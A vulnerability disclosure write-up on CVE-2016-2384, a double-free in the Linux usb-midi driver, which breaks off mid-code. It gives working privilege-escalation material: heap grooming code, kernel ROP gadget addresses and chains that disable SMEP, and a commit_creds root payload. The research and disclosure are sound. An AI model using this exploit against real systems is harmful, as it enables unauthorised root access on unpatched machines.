Overview

This post describes an exploitable vulnerability (CVE-2016-2384) in the usb-midi Linux kernel driver. The vulnerability is present only if the usb-midi module is enabled, but as far as I can see many modern distributions enable it. The bug has been fixed upstream.

The vulnerability can be exploited in two ways:

  1. Denial of service. Requires physical access (ability to plug in a malicious USB device). All the kernel versions seem to be vulnerable to this attack. I managed to cause a kernel panic on real machines with the following kernels: Ubuntu 14.04 (3.19.0-49-generic), Linux Mint 17.3 (3.19.0-32-generic), Fedora 22 (4.1.5-200.fe22.x86_64) and CentOS 6 (2.6.32-584.12.2.e16.x86_64).

  2. Arbitrary code execution with ring 0 privileges (and therefore a privilege escalation). Requires both physical and local access (ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user). All the kernel versions starting from v3.0 seem to be vulnerable to this attack. I managed to gain root privileges on real machines with the following kernels: Ubuntu 14.04 (3.19.0-49-generic), Linux Mint 17.3 (3.19.0-32-generic) and Fedora 22 (4.1.5-200.fe22.x86_64). All machines had SMEP turned on, but didn't have SMAP.

A proof-of-concept exploit (poc.c, poc.py) is provided for both types of attacks. The provided exploit uses a Facedancer21 board to physically emulate the malicious USB device. It bypasses SMEP, but doesn't bypass SMAP (though that might be possible as well). It has about a 50% success rate (the kernel crashes on failure), but this can probably be improved. Check out the demo video.

It should actually be possible to implement the entire arbitrary code execution exploit in hardware only, and therefore eliminate the local access requirement, but this approach wasn't thoroughly investigated.

The vulnerability was found with KASAN (KernelAddressSanitizer, a kernel memory error detector) and vUSBf (a virtual USB fuzzer).

The bug

The issue with the usb-midi driver is a double-free of a snd_usb_midi object, which occurs when a Midiman USB device with an invalid number of endpoints is plugged in. I used a Facedancer21 board to physically emulate such a USB device. If you don't know what a USB endpoint is, or if you're interested in how the USB protocol works in general, I suggest reading up on it here.

When a USB device is plugged in, the kernel determines which driver is responsible for this device and calls the corresponding probe() function. During probing the driver initializes the device. When probing our crafted USB MIDI device, everything goes fine until the end of snd_usbmidi_create(), when the following code is executed:

if (quirk && quirk->type == QUIRK_MIDI_MIDIMAN)
        err = snd_usbmidi_create_endpoints_midiman(umidi, &endpoints[0]);
else
        err = snd_usbmidi_create_endpoints(umidi, endpoints);
if (err < 0) {
        snd_usbmidi_free(umidi);
        return err;
}

Since we're using a Midiman device, the first if branch is executed and snd_usbmidi_create_endpoints_midiman() gets called. This function performs initialization of USB endpoints specific to Midiman devices. If we provide an invalid number of endpoints in the USB device descriptor (say zero), then snd_usbmidi_create_endpoints_midiman() fails on the following check:

if (intfd->bNumEndpoints < (endpoint->out_cables > 0x0001 ? 5 : 3)) {
        dev_dbg(&umidi->dev->dev, "not enough endpoints\n");
        return -ENOENT;
}

After that snd_usbmidi_free() gets called, which frees the snd_usb_midi object. Then, since the device probing failed, various clean up routines are invoked, and one of them calls snd_usbmidi_free() again on the same object. This results in a double free. Here is the KASAN report with the exact stack traces (line numbers are for the upstream kernel v4.4). KASAN reports it as a use-after-free, since the code uses the snd_usb_midi object in between the two kfree()s and that is what KASAN detects.
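
The control flow that leads to the second free can be sketched as a small userspace model. This is only an illustration: the struct and function names below are made up, the model counts calls instead of freeing memory, and the real cleanup path in the kernel is longer than a single function.

```c
#include <assert.h>
#include <errno.h>

/* Hypothetical stand-in for struct snd_usb_midi; it only counts frees. */
struct midi_model {
    int free_calls;
};

/* Stand-in for snd_usbmidi_free(); the real one ends in kfree(). */
void model_free(struct midi_model *umidi)
{
    umidi->free_calls++;
}

/* Stand-in for snd_usbmidi_create(): when endpoint setup fails,
 * the error path frees the object before returning. */
int model_create(struct midi_model *umidi, int endpoints_ok)
{
    if (!endpoints_ok) {
        model_free(umidi);      /* first free */
        return -ENOENT;
    }
    return 0;
}

/* Stand-in for the probe path: after a failed probe, a cleanup
 * routine frees the same object once more. */
int model_probe(struct midi_model *umidi, int endpoints_ok)
{
    int err = model_create(umidi, endpoints_ok);

    if (err < 0)
        model_free(umidi);      /* second free of the same object */
    return err;
}
```

Calling model_probe() with endpoints_ok set to 0 leaves free_calls at 2, which is the double free in miniature.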

The bug is only triggered with the device IDs that are listed with QUIRK_MIDI_MIDIMAN in sound/usb/quirks-table.h. There's also an else branch which could fail, but as pointed out by one of the kernel developers, for other USB MIDI devices, the USB descriptors are checked earlier, and the only way that snd_usbmidi_create_endpoints() could fail would be to run out of memory.

Here is the descriptor of the USB device I used to trigger the bug. The important parameters are: idVendor = 0x0763 (Midiman), idProduct = 0x1002 (MidiSport 2x2) and one of the configurations should have an interface with bInterfaceClass = 255 and zero endpoints. The idProduct might be any of the supported Midiman devices.
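
As a rough illustration of those parameters, here is a sketch that puts the relevant descriptor values next to a userspace copy of the endpoint check quoted earlier. The struct layout and names are hypothetical (a real USB descriptor has many more fields), and the function mirrors only the comparison, not the rest of snd_usbmidi_create_endpoints_midiman().

```c
#include <assert.h>
#include <errno.h>
#include <stdint.h>

/* Illustrative subset of the descriptor fields that matter here. */
struct crafted_device {
    uint16_t id_vendor;
    uint16_t id_product;
    uint8_t  interface_class;
    uint8_t  num_endpoints;
};

const struct crafted_device crafted = {
    .id_vendor       = 0x0763, /* Midiman */
    .id_product      = 0x1002, /* MidiSport 2x2 */
    .interface_class = 255,    /* vendor-specific class */
    .num_endpoints   = 0,      /* the invalid value that triggers the bug */
};

/* Same comparison as the check in the driver, lifted to userspace. */
int midiman_endpoint_check(uint8_t num_endpoints, uint16_t out_cables)
{
    if (num_endpoints < (out_cables > 0x0001 ? 5 : 3))
        return -ENOENT;
    return 0;
}
```

With zero endpoints the check fails for any out_cables value, so the error path in snd_usbmidi_create() is always taken.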

Exploitation

Now let's see how we can exploit this.

Denial of service

Causing a denial of service is fairly easy. A double-free causes quite a harmful corruption of the kernel allocator. So the only thing we need to do is to connect the USB device (maybe a few times) and the kernel crashes. It requires only physical access to the machine. Here is a script meant to be used with a Facedancer21 to emulate the USB device described above.

Arbitrary code execution

Executing arbitrary code is also possible, but is more difficult to achieve. Here's how I did it, though it's obviously not the only possible way. Overall, I turned this double-free into a racy-use-after-free and managed to overwrite an object with a pointer to another object which holds a function pointer, while the first object is still being used by the kernel. Let's go through it step by step.

If you have no idea how the Linux kernel slab allocators work or you don't know what kmalloc() caches are, read up on it somewhere (for example here, though it's somewhat outdated).

A snd_usb_midi object is allocated by the kernel via kmalloc() and falls into the kmalloc-512 cache. Each time a network packet is sent, an sk_buff object is created by the kernel. It just so happens that any sk_buff object is also allocated via kmalloc() and might fall into the kmalloc-512 cache depending on the packet size (for example, this happens with 128-byte packets).
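
To make the "same cache" idea concrete, here is a simplified model of how a kmalloc() request size maps to a cache. The list of cache sizes is an assumption about a typical x86-64 build, and the function name is made up; the point is only that every request between 257 and 512 bytes ends up in kmalloc-512, whatever the object type.

```c
#include <assert.h>
#include <stddef.h>

/* General-purpose kmalloc cache sizes (assumed, typical x86-64 config). */
static const size_t kmalloc_sizes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/* Returns the object size of the smallest cache that fits the request,
 * or 0 if the request is larger than every cache in the table. */
size_t kmalloc_cache_for(size_t size)
{
    size_t i;

    for (i = 0; i < sizeof(kmalloc_sizes) / sizeof(kmalloc_sizes[0]); i++)
        if (size <= kmalloc_sizes[i])
            return kmalloc_sizes[i];
    return 0;
}
```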

Using the double-free described above, it's possible to cause a use-after-free on an sk_buff. Imagine that an sk_buff object is allocated in between the two kfree()s of the snd_usb_midi object and placed into the same slab object. In that case, if this slab object is allocated again before it is freed as an sk_buff, it can be overwritten. That's what we're going to do.

What do we get from overwriting an sk_buff? Turns out that whenever an sk_buff is allocated, an skb_shared_info struct is placed at the end of it. Let's look at the skb_shared_info definition closely:

struct skb_shared_info {
        unsigned char   nr_frags;
        __u8            tx_flags;
        unsigned short  gso_size;
        unsigned short  gso_segs;
        unsigned short  gso_type;
        struct sk_buff  *frag_list;
        struct skb_shared_hwtstamps hwtstamps;
        u32             tskey;
        __be32          ip6_frag_id;
        atomic_t        dataref;
        void *          destructor_arg;
        skb_frag_t      frags[MAX_SKB_FRAGS];
};

An skb_shared_info struct has a destructor_arg field, which points to a ubuf_info struct (though it's declared as a void * pointer). Let's take a look at the definition of the ubuf_info:

struct ubuf_info {
        void (*callback)(struct ubuf_info *, bool zerocopy_success);
        void *ctx;
        unsigned long desc;
};

Here we go, it contains a function pointer, which is probably called at some point.

So we want to overwrite the destructor_arg field in an skb_shared_info of an sk_buff and make it point to a crafted ubuf_info which has the callback field set to whatever we want. For that we need to be able to do the following three things from userspace (for example, by calling syscalls from a binary running as a non-privileged user):

  1. Allocate a 512-byte sk_buff
  2. Allocate a 512-byte object via kmalloc() with controlled data
  3. Trigger the callback

As I mentioned before, a 512-byte sk_buff is allocated whenever a 128-byte packet is sent. The allocated sk_buff won't be freed until the packet is delivered, delivery fails, or the socket is closed. So we can just create a couple of sockets and send, say, a UDP packet from one to the other.
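
A minimal sketch of that step, assuming a loopback UDP pair is good enough: one socket is bound to an ephemeral port, the other sends a 128-byte packet to it, and nobody reads it. The function name and the choice of loopback are illustrative and not taken from poc.c.

```c
#include <assert.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define PACKET_SIZE 128

/* Sends one 128-byte UDP packet over loopback and leaves it unread in the
 * receiver's queue. Returns the number of bytes sent, or -1 on error.
 * On success the caller owns both descriptors; closing *rx_fd later
 * drops the queued packet. */
int queue_udp_packet(int *tx_fd, int *rx_fd)
{
    struct sockaddr_in addr;
    socklen_t len = sizeof(addr);
    char packet[PACKET_SIZE];
    ssize_t sent;
    int rx, tx;

    rx = socket(AF_INET, SOCK_DGRAM, 0);
    if (rx < 0)
        return -1;
    tx = socket(AF_INET, SOCK_DGRAM, 0);
    if (tx < 0) {
        close(rx);
        return -1;
    }

    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    addr.sin_port = 0;                      /* let the kernel pick a port */

    if (bind(rx, (struct sockaddr *)&addr, sizeof(addr)) < 0 ||
        getsockname(rx, (struct sockaddr *)&addr, &len) < 0) {
        close(rx);
        close(tx);
        return -1;
    }

    memset(packet, 'A', sizeof(packet));
    sent = sendto(tx, packet, sizeof(packet), 0,
                  (struct sockaddr *)&addr, sizeof(addr));
    if (sent < 0) {
        close(rx);
        close(tx);
        return -1;
    }

    *tx_fd = tx;
    *rx_fd = rx;
    return (int)sent;
}
```

Keeping the receiving socket open without calling recv() is what keeps the packet, and therefore its sk_buff, alive until we decide to close the socket.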

Next, we need a way to allocate a 512-byte object with controlled data. There's actually a way to allocate objects from userspace with both the size and the data controlled: sending control messages on a socket with the sendmmsg() syscall. During sendmmsg() the kernel allocates a buffer for the control message via kmalloc() and copies the message there.
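
Here is a hedged sketch of such a call. The helper name and the one-byte payload are made up for illustration; the only point is that msg_control and msg_controllen are fully chosen by the caller. With arbitrary bytes in the control buffer the call itself is likely to fail (the data is not a valid control message), which does not matter if all we want is the copy into a kernel buffer.

```c
#define _GNU_SOURCE             /* for sendmmsg() and struct mmsghdr */
#include <assert.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <netinet/in.h>

#define SPRAY_SIZE 512

/* Issues one sendmmsg() whose control buffer is ctl_len bytes of
 * caller-controlled data. Returns whatever sendmmsg() returns. */
int spray_control_message(int fd, struct sockaddr_in *dst,
                          void *ctl, size_t ctl_len)
{
    char byte = 0;
    struct iovec iov;
    struct mmsghdr msg;

    assert(ctl != NULL);

    iov.iov_base = &byte;
    iov.iov_len = sizeof(byte);

    memset(&msg, 0, sizeof(msg));
    msg.msg_hdr.msg_name = dst;
    msg.msg_hdr.msg_namelen = sizeof(*dst);
    msg.msg_hdr.msg_iov = &iov;
    msg.msg_hdr.msg_iovlen = 1;
    msg.msg_hdr.msg_control = ctl;          /* controlled data */
    msg.msg_hdr.msg_controllen = ctl_len;   /* controlled size, e.g. SPRAY_SIZE */

    return sendmmsg(fd, &msg, 1, 0);
}
```

In an exploit this would be called in a loop on a UDP socket with a SPRAY_SIZE buffer, so that some of the allocations land in the slot we care about.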

Now, we need a way to trigger the callback. It actually gets called when the corresponding sk_buff is being freed:

static void skb_release_data(struct sk_buff *skb)
{
        struct skb_shared_info *shinfo = skb_shinfo(skb);
        int i;

        if (skb->cloned &&
            atomic_sub_return(skb->nohdr ? (1 << SKB_DATAREF_SHIFT) + 1 : 1,
                              &shinfo->dataref))
                return;

        for (i = 0; i < shinfo->nr_frags; i++)
                __skb_frag_unref(&shinfo->frags[i]);

        /*
         * If skb buf is from userspace, we need to notify the caller
         * the lower device DMA has done;
         */
        if (shinfo->tx_flags & SKBTX_DEV_ZEROCOPY) {
                struct ubuf_info *uarg;

                uarg = shinfo->destructor_arg;
                if (uarg->callback)
                        uarg->callback(uarg, true);
        }

        if (shinfo->frag_list)
                kfree_skb_list(shinfo->frag_list);

        skb_free_head(skb);
}

As you can see, it only gets called when shinfo->tx_flags has the SKBTX_DEV_ZEROCOPY flag set, but we can overwrite tx_flags with the desired value, just like destructor_arg.
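
The data we want to land on top of the skb_shared_info can be sketched like this. Everything here is a userspace mirror with assumed details: the field sizes in fake_shinfo_head are a guess for x86-64 kernels of that era, the SKBTX_DEV_ZEROCOPY value is assumed, and shinfo_offset (where the skb_shared_info sits inside the 512-byte object) is a hypothetical parameter that has to be determined for the target kernel.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Userspace mirror of the kernel's struct ubuf_info. */
struct fake_ubuf_info {
    void (*callback)(struct fake_ubuf_info *, bool);
    void *ctx;
    unsigned long desc;
};

/* Mirror of the leading fields of skb_shared_info (sizes are assumed). */
struct fake_shinfo_head {
    uint8_t  nr_frags;
    uint8_t  tx_flags;
    uint16_t gso_size;
    uint16_t gso_segs;
    uint16_t gso_type;
    void    *frag_list;
    int64_t  hwtstamps;       /* stands in for struct skb_shared_hwtstamps */
    uint32_t tskey;
    uint32_t ip6_frag_id;
    int32_t  dataref;         /* stands in for atomic_t */
    void    *destructor_arg;
};

#define FAKE_SKBTX_DEV_ZEROCOPY (1 << 3)    /* assumed flag value */

/* Writes a crafted header at shinfo_offset inside buf. nr_frags and
 * frag_list stay zero so skb_release_data() skips those branches.
 * Returns 0 on success, -1 if the header does not fit. */
int craft_overwrite(unsigned char *buf, size_t buf_len, size_t shinfo_offset,
                    struct fake_ubuf_info *uarg)
{
    struct fake_shinfo_head head;

    if (shinfo_offset > buf_len || buf_len - shinfo_offset < sizeof(head))
        return -1;

    memset(&head, 0, sizeof(head));
    head.tx_flags = FAKE_SKBTX_DEV_ZEROCOPY;
    head.destructor_arg = uarg;
    memcpy(buf + shinfo_offset, &head, sizeof(head));
    return 0;
}
```

The resulting buffer is what would be passed as the control message, with uarg->callback set to the address we want the kernel to call.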

So what we're going for is the following sequence of events:

  1. snd_usb_midi freed
  2. sk_buff allocated in the same place when sending a packet on a socket
  3. snd_usb_midi freed again, therefore freeing the sk_buff, which is actually still being used
  4. a chunk of memory is allocated by sendmmsg() in the same place, overwriting the skb_shared_info in the sk_buff
  5. sk_buff freed, therefore triggering the callback
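
The first four steps can be replayed on a toy allocator. This is a deliberately simplified model, not how SLUB is implemented: it assumes a plain LIFO freelist with no double-free detection, and all names are invented. It shows why the sk_buff and the sendmmsg() buffer end up aliasing the same slot.

```c
#include <assert.h>

#define SLOTS 4

/* Toy LIFO freelist: free pushes a slot index, alloc pops the latest one. */
struct toy_cache {
    int free_stack[SLOTS * 2];  /* extra room for duplicates from a double free */
    int top;
};

void toy_init(struct toy_cache *c)
{
    int i;

    c->top = 0;
    for (i = SLOTS - 1; i >= 0; i--)
        c->free_stack[c->top++] = i;    /* slot 0 ends up on top */
}

int toy_alloc(struct toy_cache *c)
{
    assert(c->top > 0);
    return c->free_stack[--c->top];
}

void toy_free(struct toy_cache *c, int slot)
{
    assert(c->top < SLOTS * 2);
    c->free_stack[c->top++] = slot;     /* no check that slot is already free */
}

/* Replays steps 1-4; returns 1 if the sk_buff and the control buffer alias. */
int toy_sequence_aliases(void)
{
    struct toy_cache c;
    int midi, skb, ctl;

    toy_init(&c);
    midi = toy_alloc(&c);   /* snd_usb_midi allocated during probing */
    toy_free(&c, midi);     /* 1. snd_usb_midi freed */
    skb = toy_alloc(&c);    /* 2. sk_buff lands in the same slot */
    toy_free(&c, midi);     /* 3. second free releases the live sk_buff */
    ctl = toy_alloc(&c);    /* 4. sendmmsg() buffer reuses the slot */
    return skb == midi && ctl == skb;
}
```

In the real kernel other allocations and frees interleave with these, which is why the exploit has to race and does not always win.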

This can be achieved by opening multiple sockets and sending 128-byte packets as well as control messages in a loop while connecting the USB device at the same time. This racy approach relies on a set of kmalloc() and kfree() calls happening in the right order, but the exploit I wrote seems to work with a fairly good success rate. Since we control the callback value, we can point it to any payload, which is then executed with kernel privileges. By using a classic commit_creds(prepare_kernel_cred(0)) payload we can gain root access.

Where do we allocate the ubuf_info struct, which actually holds the callback pointer? The simplest way is to allocate it in userspace (as a global variable or with mmap()). The same goes for the payload that gets executed (however, we can use ROP, read below).

The v3.0+ version requirement comes from the fact that the callback field wasn't present before v3.0. However, there might be other in-kernel objects of size 512 with function pointers in them that could be used for exploitation.

Kernel hardening

The Linux kernel has support for a few hardening features that make exploitation more difficult. For instance there are SMEP (Supervisor Mode Execution Protection) and SMAP (Supervisor Mode Access Prevention). SMEP causes an oops whenever the kernel tries to execute code from the userspace memory and SMAP causes an oops whenever the kernel tries to access the userspace memory directly.

SMAP and SMEP are both CPU features that require support on the kernel side, which basically means that each of them is enabled only if:

  1. The CPU supports it
  2. The kernel supports it
  3. It's enabled in the kernel configuration

The kernel has supported SMEP since v3.0 and SMAP since v3.7, and both are usually enabled in modern distributions. However, while Intel CPUs have supported SMEP for a few years (since the Ivy Bridge architecture), SMAP support was added quite recently (starting with the Broadwell architecture), and therefore not many CPUs out there have it.
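
One quick way to see whether a given machine advertises these features is to look for the smep and smap entries in the flags line of /proc/cpuinfo. The sketch below does that; the helper names are made up, and a present flag only tells you what the kernel reports for the CPU, so treat it as a first check rather than proof that the protection is active.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Returns 1 if `flag` appears as a whole word in `line`, else 0. */
int line_has_flag(const char *line, const char *flag)
{
    size_t n = strlen(flag);
    const char *p = line;

    if (n == 0)
        return 0;
    while ((p = strstr(p, flag)) != NULL) {
        int starts = (p == line) || p[-1] == ' ' || p[-1] == '\t';
        int ends = p[n] == '\0' || p[n] == ' ' || p[n] == '\n';

        if (starts && ends)
            return 1;
        p += n;
    }
    return 0;
}

/* Scans /proc/cpuinfo for `flag` in a "flags" line.
 * Returns 1 if found, 0 if not found, -1 if the file can't be read. */
int cpu_has_flag(const char *flag)
{
    char line[8192];
    FILE *f = fopen("/proc/cpuinfo", "r");
    int found = 0;

    if (!f)
        return -1;
    while (fgets(line, sizeof(line), f)) {
        if (strncmp(line, "flags", 5) == 0 && line_has_flag(line, flag)) {
            found = 1;
            break;
        }
    }
    fclose(f);
    return found;
}
```

For example, cpu_has_flag("smep") returning 1 together with cpu_has_flag("smap") returning 0 would match the machines I tested on.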

If you take a close look at the exploitation process I described above, you can see that both SMEP and SMAP will prevent the code execution. SMEP will detect that we execute code from userspace when the callback is called, and SMAP will detect that the kernel accesses a ubuf_info that resides in userspace.

Another existing Linux kernel hardening technique is KASLR (Kernel Address-Space Layout Randomization). The kernel supports it starting from v3.14, but at the moment it's disabled by default in most modern distributions.

SMEP bypass

I'm going to show how to bypass SMEP and make the exploitation possible on many modern CPUs with modern kernels. The classic way to do it is to use in-kernel ROP (Return-Oriented Programming) and that's what we're going to do. If you're not familiar with ROP, I suggest reading up on it somewhere (there are many tutorials available). Here I'm going to assume that our CPU is x86-64.

Overall, I'm going to use an xchg eax, esp gadget to point the stack pointer at a particular userspace address so that we control the stack, disable SMEP via ROP, restore the stack pointer, and then jump to a commit_creds(prepare_kernel_cred(0)) payload, which resides in userspace memory. Let's go through it step by step.

First, let's take a look at the disassembly around the code that calls the callback:

                if (uarg->callback)
ffffffff816c39b9:       48 8b 07                mov    (%rdi),%rax
ffffffff816c39bc:       48 85 c0                test   %rax,%rax
ffffffff816c39bf:       74 07                   je     ffffffff816c39c8 <skb_release_data+0x98>
                        uarg->callback(uarg, true);
ffffffff816c39c1:       be 01 00 00 00          mov    $0x1,%esi
ffffffff816c39c6:       ff d0                   callq  *%rax

As we can see, the address of the callback is stored in the rax register and then callq is used to call it. Let's imagine that the callback contains the address of the xchg eax, esp ; ret gadget. In that case after callq *%rax this gadget will get executed. It will swap the values of eax and esp and at the same time zero out the higher 32 bits of rax and rsp (see this for details). Therefore, if the gadget address is 0xffffffff8100008a then the new rsp value will be 0x000000008100008a, which is a userspace address. If we mmap() this address in advance, we will get control of the stack. As a side note, our fake stack will reside in the userspace, and that's another thing that SMAP will detect.
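
The address arithmetic of the pivot, plus the mapping of the fake stack, can be sketched as follows. The function names, the assumed 4 KiB page size and the choice to map a few pages on both sides of the target are illustrative; the gadget address is the example value from the paragraph above.

```c
#define _DEFAULT_SOURCE         /* for MAP_ANONYMOUS */
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <sys/mman.h>

#define PAGE_SIZE_ASSUMED UINT64_C(0x1000)

/* Value of rsp after `xchg eax, esp` when rax held the gadget address:
 * the upper 32 bits are zeroed, the lower 32 bits are kept. */
uint64_t pivot_target(uint64_t gadget_addr)
{
    return gadget_addr & UINT64_C(0xffffffff);
}

/* Maps `pages` pages on each side of the pivot target, so that the ROP
 * chain can extend upward and pushes have room below.
 * Returns 0 on success, -1 on failure. */
int map_fake_stack(uint64_t gadget_addr, uint64_t pages)
{
    uint64_t target = pivot_target(gadget_addr);
    uint64_t base = (target & ~(PAGE_SIZE_ASSUMED - 1)) -
                    pages * PAGE_SIZE_ASSUMED;
    size_t len = (size_t)((2 * pages + 1) * PAGE_SIZE_ASSUMED);
    void *p = mmap((void *)(uintptr_t)base, len, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);

    return p == MAP_FAILED ? -1 : 0;
}
```

After a successful map_fake_stack(), the ROP chain is written starting at pivot_target(gadget_addr).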

Now we can put our ROP payload into this stack and we're good. There's an issue though. Suppose our ROP payload got executed. After that we need a way to restore the stack pointer back to its original value and return to where the callback was called from. We can't just do xchg eax, esp again, since after the first xchg we lost the higher 32 bits of the original rsp value.

However, there's a way to restore these 32 bits. If you think about it, rbp has a very close value to rsp, since rsp is saved into rbp in each function's prologue, and the chances that they have the same higher 32 bits are insanely high. So we can just use the higher 32 bits of rbp as the higher 32 bits of rsp and the eax value after the xchg instruction as the lower 32 bits of rsp. We'd better save the eax value right after the xchg, so we can use the rax register in the ROP payload. That's no problem, we can just save it to some userspace address with the first few ROP gadgets in the payload. That's actually another place where we access userspace, which can be detected by SMAP.
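
Written out as plain C, the reconstruction is a mask and an OR. The function name and the sample register values in the usage note are made up; the only assumption carried over from the text is that rbp and the original rsp share their upper 32 bits.

```c
#include <assert.h>
#include <stdint.h>

/* Rebuilds the original rsp from the upper half of rbp and the lower
 * half that ended up in eax after `xchg eax, esp`. */
uint64_t restore_rsp(uint64_t rbp, uint32_t saved_eax)
{
    return (rbp & UINT64_C(0xffffffff00000000)) | (uint64_t)saved_eax;
}
```

For instance, with a hypothetical rbp of 0xffff88003a5b7e50 and a saved eax of 0x3a5b7e18, restore_rsp() yields 0xffff88003a5b7e18.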

I used the following ROP gadgets to save the eax value:

0xffffffff8118991d : pop rdi ; ret
0xffffffff810fff17 : mov dword ptr [rdi], eax ; ret

So the first part of the payload looks like:

#define POP_RDI_RET               0xffffffff8118991dL
#define MOV_DWORD_PTR_RDI_EAX_RET 0xffffffff810fff17L

#define CHAIN_SAVE_EAX                  \
  *stack++ = POP_RDI_RET;               \
  *stack++ = (uint64_t)&saved_eax;      \
  *stack++ = MOV_DWORD_PTR_RDI_EAX_RET;

Now that we have eax saved, we can do something more useful, for instance disable SMEP. Whether SMEP is enabled or not is controlled by bit 20 of the cr4 register. There are a few gadgets in the kernel which allow us to set the cr4 value. I used these:

0xffffffff8118991d : pop rdi ; ret
0xffffffff8105b8f0 : push rbp ; mov rbp, rsp ; mov cr4, rdi ; pop rbp ; ret

Note that the second gadget also pushes and then pops back the rbp register. If we omit the push, then we will end up with garbage in rbp.

As a result, the next part of the payload looks like:

#define POP_RDI_RET               0xffffffff8118991dL
#define MOV_CR4_RDI_RET           0xffffffff8105b8f0L
#define CR4_DESIRED_VALUE         0x407f0

#define CHAIN_SET_CR4                   \
  *stack++ = POP_RDI_RET;               \
  *stack++ = CR4_DESIRED_VALUE;         \
  *stack++ = MOV_CR4_RDI_RET;           
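
The desired cr4 value is just the current value with bit 20 cleared. A small sketch of that computation follows; the helper names are made up, and the 0x1407f0 used in the usage note is only a hypothetical starting value, since the real one depends on the CPU and kernel.

```c
#include <assert.h>
#include <stdint.h>

#define CR4_SMEP_BIT 20

/* Returns cr4 with the SMEP bit cleared and all other bits untouched. */
uint64_t cr4_without_smep(uint64_t cr4)
{
    return cr4 & ~(UINT64_C(1) << CR4_SMEP_BIT);
}

/* Returns 1 if the SMEP bit is set in the given cr4 value, else 0. */
int cr4_smep_enabled(uint64_t cr4)
{
    return (int)((cr4 >> CR4_SMEP_BIT) & 1);
}
```

For a starting value of 0x1407f0, cr4_without_smep() gives 0x407f0, the CR4_DESIRED_VALUE used in the chain.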

Now that we have disabled SMEP, we can jump to a userspace payload, so we don't need to mess around with ROP anymore. Here are the gadgets that I used:

0xffffffff810053bc : pop rcx ; ret
0xffffffff81040a90 : jmp rcx

And here is the last part of the ROP payload:

#define POP_RCX_RET               0xffffffff810053bcL
#define JMP_RCX                   0xffffffff81040a90L

#define CHAIN_JMP_PAYLOAD               \
  *stack++ = POP_RCX_RET;               \
  *stack++ = (uint64_t)&payload;        \
  *stack++ = JMP_RCX;
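
Putting the three parts together, the fake stack ends up holding nine 64-bit words. The function below is a sketch of that layout written as a plain function instead of macros; build_chain and its parameters are invented names, and the gadget addresses are the ones listed above, which are specific to one kernel build.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Gadget addresses from the text; valid for one particular kernel only. */
#define POP_RDI_RET               0xffffffff8118991dULL
#define MOV_DWORD_PTR_RDI_EAX_RET 0xffffffff810fff17ULL
#define MOV_CR4_RDI_RET           0xffffffff8105b8f0ULL
#define POP_RCX_RET               0xffffffff810053bcULL
#define JMP_RCX                   0xffffffff81040a90ULL
#define CR4_DESIRED_VALUE         0x407f0ULL

/* Writes the whole chain to `stack` and returns the number of words used.
 * saved_eax_addr: userspace address where eax gets stored.
 * payload_addr:   userspace address of the final payload. */
size_t build_chain(uint64_t *stack, uint64_t saved_eax_addr,
                   uint64_t payload_addr)
{
    uint64_t *p = stack;

    /* 1. save eax (lower half of the original rsp) */
    *p++ = POP_RDI_RET;
    *p++ = saved_eax_addr;
    *p++ = MOV_DWORD_PTR_RDI_EAX_RET;

    /* 2. write cr4 with the SMEP bit cleared */
    *p++ = POP_RDI_RET;
    *p++ = CR4_DESIRED_VALUE;
    *p++ = MOV_CR4_RDI_RET;

    /* 3. jump to the userspace payload */
    *p++ = POP_RCX_RET;
    *p++ = payload_addr;
    *p++ = JMP_RCX;

    return (size_t)(p - stack);
}
```

The `stack` pointer passed in would be the mmap()ed address that rsp points to right after the xchg gadget runs.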

We can write the userspace payload in assembly, which is much easier than doing ROP. Here's the payload that I used:

// Unfortunately GCC does not support `__attribute__((naked))` on x86, which
// can be used to omit a function's prologue, so I had to use this weird
// wrapper hack as a workaround. Note: Clang does support it, which means it
// has better support of GCC attributes than GCC itself. Funny.
void wrapper() {
  asm volatile ("                         \n\
    payload:                              \n\
      movq %%rbp, %%rax                   \n\
      movq $0xffffffff00000000, %%rdx     \n\
      andq %%rdx, %%rax                   \n\
      movq %0, %%rdx                      \n\
      addq %%rdx, %%rax                   \n\
      movq %%rax, %%rsp                   \n\
      jmp get_root                        \n\
  " : : "m"(saved_eax) : );
}

void payload();

The payload first restores rsp using rbp and the saved eax and then jumps to a get_root() payload, which does commit_creds(prepare_kernel_cred(0)). There's a reason why the rsp value is restored first: the current kernel thread can easily get rescheduled by the kernel during get_root(), and since the structure that describes a kernel thread is stored at the end of its stack, the kernel won't find it there and will crash.

After the get_root() payload gets executed, the kernel returns to where the payload was called from, since the last return address was put by callq *%rax on the original stack. And that's it. We have successfully bypassed SMEP and got root privileges. Here is a demo video. Woohoo!

I used ROPgadget to extract the gadgets. All of the gadgets I used seem to be present in all of the stock kernel binaries I looked at (except for jmp rcx, but it's easily replaceable). Note that gadgets shouldn't be extracted from the .init.text section of a kernel binary, since the code from there gets overwritten after the kernel is done booting.

Initially I was looking for something like xchg rax, rsp, so I wouldn't need to mess around with restoring rsp that much, but it seems that gadgets of this kind are not present in the kernel binaries.

Since slab objects are sometimes cached in a per-CPU list, it's better to run a few instances of the binary. The number of instances should be equal to or greater than the number of CPU cores. In that case it's highly probable that at least one of the instances will be scheduled on the same CPU that performs the probing and will therefore allocate the per-CPU cached objects.
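
Instead of starting the binary several times by hand, the instances could also be forked from a single process. Here is a minimal sketch under that assumption; the function names are invented, idle_work() is a placeholder for the actual per-instance exploit loop, and nothing here pins a child to a particular CPU.

```c
#include <assert.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Number of instances to start: one per online CPU, at least one. */
long worker_count(void)
{
    long n = sysconf(_SC_NPROCESSORS_ONLN);

    return n > 0 ? n : 1;
}

/* Forks n children that each run work() and exit.
 * Returns how many children exited cleanly. */
int run_workers(long n, void (*work)(void))
{
    long i;
    int started = 0, ok = 0;

    for (i = 0; i < n; i++) {
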